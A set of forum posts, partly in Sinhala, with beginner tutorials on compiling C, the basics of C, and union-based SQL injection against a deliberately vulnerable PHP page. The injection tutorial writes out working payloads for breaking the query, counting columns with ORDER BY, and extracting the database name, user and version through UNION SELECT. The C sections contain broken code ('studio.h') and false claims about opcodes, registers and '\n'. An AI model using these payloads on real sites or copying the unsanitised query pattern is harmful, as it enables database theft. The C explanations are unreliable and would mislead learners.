Posts made by Thilan Danushka

godak kattiya dsanne na meka gana.

@Malith Thanks ayiya :-)

thank you guys. I'll post more.

anik treads okkoma English ne bn. ekayi mehema damme :-)

In previous tutorial we got a quick idea about C language. Today we are going to learn what is compiling programs and why it is needed.

As the first step let’s see what’s a computer program and how they handle the computer to do our needs. You know that computers only works with binary. Take this example. If we want to print “hello ” to the screen we can write a program as this.

#include <studio.h>
int main(){
  printf("hello\n");
  return 0;
}

But computer can’t understand this language. This is the time Compiler comes to play. Compiler will transform C code into mashing instructions. Mashing code is a set of simple instructions.

CPU can process simple instructions like move eax, esp / pop ebp/ push esp etc quickly.
If there is a instruction as move eax 0x00
CPU will move zero into eax register. Also if we say push esp CPU will take the value from ebp and push that on to top of the stack.
But even instructions like move eax 0x00 are not actual mashing language. It’s something called Assembly language. So how CPU understand assembly ?.
There is a unique number for every assembly command. We call these hex numbers as Op-codes or operational codes.If opcode for move something into eax is 5f , opcode for move eax ,0x00 is 5f 00.

After converting these hex values to binary it will be something like ‘0000011000100100000011‘ Now CPU can understand what it says and quickly do that instruction. If we take long story shortly what happens hear is transform our C instructions into CPU readable mashing language. That’s the job done by compiler.Now we have a clear idea about compiler and next see how we can compile C programs.
Compiling on a Linux mashing

If you are compiling a program on a Unix/Linux system, no additional software is needed. There is a awesome compiler called GCC for this.

You can easily open a shell and type

GCC -o [executable_name] [program_name.c]

GCC does rest for you.
Now you can run it by entering ./program_name.

If you don’t specify a name for executable file the default name will be a.out .
Compiling on a windows mashing.

In sometimes you may need to write C codes in windows environment. For a example if you are learning win32 exploit development then you want to write your own vulnerable codes for practice. So let’s see how you can compile in windows. For this purpose you can use a compiler like dev c++. Dev compiler is a nice tool for compile and debug programs .

Now we can run the exe file.

Also you want a editor for write codes. You can use sublime , nano gedit or what ever you like. Personally I love sublime for coding.

OK guys it’s all for this tutorial. Thank you for reading.Don’t forget to share it.(sharing is caring 🙂 . )

C you again on next posts.
If you loved my tutorial. Share it o

C. Yes the classic C language is the mother language of many programing languages like C++/C# . Do you know that our lovely language , python interpreter is written in C . In 1972 , C language was developed by “Dennis Ritchie” for UNIX. In early days C was used as the core language of UNIX operating system. Now many other operating systems use it as core language . Now C is one of the most widely used programming languages.
Why I learn C?

1 ) Learn exploit development
If you plan to learn exploit writing for windows or Linux , there are no excuses. You must learn C for understand those concepts. Also you need to learn how to compile C programs and how to debug them in a debugger.
2 ) Learn reverse engineering or malware analysis.
You need C for both of above sections because C is great for learn basics of computer architecture.
3) Mange memory directly.
C language allow you to work with memory unlike many other languages. You can use heap by using functions like malloc(). Also there are varies options like structs, pointers and arrays for access memory.

There are bunch of reasons to learn C and I’m not going to write all of them hear.
The concept of Functions

If I say C is built on a concept called a function, I’m not wrong. Every little C program uses functions. It may be two three or more. But definitely there should be a one function. So first of all let’s understand what is a function. Think about this real life example. There is a group of human that trained to do a work. If we supply raw data, group will process those data and give us the result. We may supply different kind of data and the output will be different also, but the process is same.Only thing that group of humans do is launch a per-configured flaw on data. This situation is what happens inside a function.

Now you have a clear idea about functions. Let’s see how a C program looks like.

#include <stdio.h>
int main(){
  printf("welcome to hacksland\n");
  return 0;
}

Oh too many lines of code. 😮 . In our python printing tutorial it took only one line to do the same as above.

print("welcome to hacksland")

You may think , why this much of code lines are required to a simple hello world program?. Well , You will realize this at end of the tutorial.
Anyway we are going to analyze above C code and see what it actually does.

First , focus only on 3rd line of code. You can see a format like this.

printf("welcome to hacksland\n");

What does it mean? It is a function. Yeah if we give a string to this function, it will print that to the screen. In above example we gave welcome to hacksland. So it will print that data . What about /n . That’s called a string terminator and we’ll talk more about that later.

There is another thing to notice. Did you see a semicolon after the printf statement?. That’s how we indicate the end of a line in C language.

Now it’s time to look at other parts of our code. In first line we can see a #include <studio.h> statement. What it does?. We used a function called printf in our code. But how computer know what to do when we give a string to the function. We give a set of instructions to do when function is called. So computer process those instructions and give the result. In above example stdio.h file is holding those instructions for printf function. That’s why we included it before use printf.In Linux these Header files are located in “/usr/include” . If we look inside a header file we can see printf function looks like following.

int printf(){
  /*
  hear is the code for print the string that supplied to function.
  */
  return 0;
}

There are couple of things to see.
At the beginning of function you can see a keyword as int . Also there is a return 0 at end. First we say computer that after completing the function it will give an integer. Next using return 0 we give that value. ( Hear it is 0 ) . Actually value zero means function was completed successfully.

In our example there was something as int main(). Do you believe if I say that’s also a function. ? 🙂
Yes buddy. In this tutorial I said that there is even one function in every C program. That’s main function. Now you can understand why there is a int main() and return 0. Yes you guessed it. main function also return value zero after completing it.

Ok guys. We got a clear idea on what is C and for what we can use it also we could understand basics of C language.In next tutorials we are going to go deep concepts of this awesome language. If you have any problems leave a comment. Thank you for reading.

C you again. 🙂

Hello all,

I hope you know how to do a SQL injection and have used it .In this tutorial we are going to see how it is working. What’s going on under the hood. How web application handle our input and process the SQL quarry. Let’s see.

Imagine that there is a web application like this.
Front-End Web Application

Hear we see how web application takes input from the user and send that data to PHP script through a GET request.

<html>
<head>

<title>SQL Injection Tutorial - HacksLand</title>
</head>

<body>

<h1><center>HacksLand - Ethical Hacking Tutorials</center></h1>
<form method = "GET" action="index.php">
	<h2><center>Give the ID for fetch details</center></h2><br>
	<input align="center" type="text" name="id">

</form>

</body>
</html>

Back-end PHP Script

Now there should be a back-end script that handle this submitted data and make a SQL quarry.

After SQL quarry return some data from database PHP script processes that data and give user output.

Assume that following is the PHP code .

<?php
include("sql_connect.php");
if(isset($_GET['id']))
{
  $id=$_GET['id'];
  $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  $result=mysqli_query($con, $sql);
  $row = mysqli_fetch_array($result, MYSQLI_BOTH);

  if($row)
  {
   echo 'Name for ID: '. $row['name'];
   echo "<br>";
   echo 'Age for ID: ' .$row['age'];
  }
  else
  {
   print_r(mysqli_error($con));
  }
}
else { echo "Please input the ID";}
?>

I hope you can understand what is going hear.

For this example we need a table that used by SQL quarry to take data from.

So all OK and fine.
SQL Quarry

Now let’s see how this is happening.

Imagine that I enter 3 as the input. So our ID will be equal to 3. What about our SQL quarry?

$sql="SELECT * FROM users WHERE id='3' LIMIT 0,1";

So it will give us the output.

Name for ID: Clara
Age for ID : 18

Nice!. It’s look like web application is working fine.

Do you remember in our previous tutorial we used a single quote to break a SQL quarry?

what if I enter 3′ as the input?

It give me an error.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3'' LIMIT 0,1′ at line 1

What the fuck goes hear?

$sql="SELECT * FROM users WHERE id='3'' LIMIT 0,1";

You can clearly see that there is a syntax error near ID=’3” . Previously I explained why this happening.
Injecting SQL Quarry

Now we have to see how we can fix this error and extract data from the database. What if I enter flowing payload?.

3′ –+

Now our quarry is.

$sql="SELECT * FROM users WHERE id='3' --+' LIMIT 0,1";

But actually we only care the code before –+ Because it’s a comment character in SQL and everything after that will be ignored. So now this cod is valid and it’ll give us the output as expected.

This is the time to fetch data from database.But how?

Can we use another SELECT command with this one?

Yes indeed. we can use two SELECT commands with UNION operator like this.

SELECT Name,Age FROM users UNION SELECT Subject,ID FROM users

But one thing. Both of SELECT quarries must use slimier number of columns to fetch data. It’s no matter that they use different columns , only amount of used columns should be same.

You may say that it’s simple there are 5 columns in table. No buddy in real life you can’t see the table and you can’t figure out how many columns are there. 🙁

We can you a trick for finding the number of columns used by first SELECT command.

Think about our table and following commands.

SELECT * FROM users  ORDER BY Name
SELECT * FROM users  ORDER BY 3

first command says select all columns from the users table and the order of results should be accordion to Name column. Second command also says that but results should be order with 3rd column(Age).

So even we don’t know column names we can order by 1,2,3 etc OK.

Now I enter this as the ID .

3′ order by 1–+

Let’s see our quarry.

$sql="SELECT * FROM users WHERE id= '3' order by 1--+' LIMIT 0,1";

This gives us output as expected because there are more columns than 1 . So it’s possible to order result accordion to the first column.

Next we try order by 2. This also will be fine. Web application will work normally until we say order by 5.

What if we enter order by 6 ?

Surely it’ll give an error because there are no 6 columns. So by using this method we can find how many columns are using the first SELECT command. Now we can use another SELECT command

SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1

What going on hear is SQL quarry think that there is another table like following and quarry try to fetch data from both of them. After those data will be print to screen by PHP code.

Now if we can print data from second table we can find which columns are using by web application to show data.(In this example we know that PHP script get Name and Age columns). But unfortunately we still we can see only flowing output. 🙁

Name for ID: Clara
Age for ID : 18

why that? Because while our SQL quarry see there are two tables it first try to fetch data from first table. So if we want to get data from second one we must set a null value to first SELECT command . Our final payload .

SELECT * FROM users WHERE id= '-3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1

Since -3 is not in ID column data from our second table will be printed out.

Name for ID: 2
Age for ID : 3

Finlay it’s success. We can see column 2 and 3 is used by web app.

Now we can use these 2 channels for get any data from database. 🙂
Extracting Basic information

First of all let’s give a try to find out database name.

SELECT * FROM users WHERE id= '-3' UNION SELECT 1,database(),3,4,5 --+ ' LIMIT 0,1

we can see the database name in the screen.

Name for ID: database_name
Age for ID : 3

SELECT * FROM users WHERE id= '-3' UNION SELECT 1,version(),3,4,5 --+ ' LIMIT 0,1

Like this you can use

database() , user() , version() etc to fetch some basic data.

In next tutorial we are going to learn how to use SQL injection to extract more data.